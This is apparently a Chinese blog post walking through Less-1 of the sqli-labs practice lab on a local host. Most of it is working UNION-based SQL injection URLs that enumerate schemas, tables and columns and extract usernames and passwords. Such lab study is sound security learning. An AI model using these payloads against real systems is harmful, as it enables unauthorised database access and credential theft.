Less-1【报错注入】

Less-1
利用'进行测试,后面跟or语句测试注入点,证明id字段可以注入
利用order by X 测试该表格几列数据,并测试第几列数据可以注入
爆库过程
  • 库名
        单独爆破
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select schema_name from information_schema.schemata limit 2,1),3--+
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select schema_name from information_schema.schemata limit 3,1),3--+
利用group_concat爆破
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+limit 0,1
或者
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
 
  • 表名
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select%20group_concat(table_name)%20from%20information_schema.tables),3--+
  • 表对应列名
(select group_concat(column_name) from information_schema.columns where table_name='users')
  • user中对应的password和user
(select group_concat(username)from users)
(select group_concat(password)from users)
 
 
 
 
 
posted @ 2020-10-26 11:19  峰中追风  阅读(137)  评论(0编辑  收藏  举报

___________________________________________________________________________________________没有白跑的路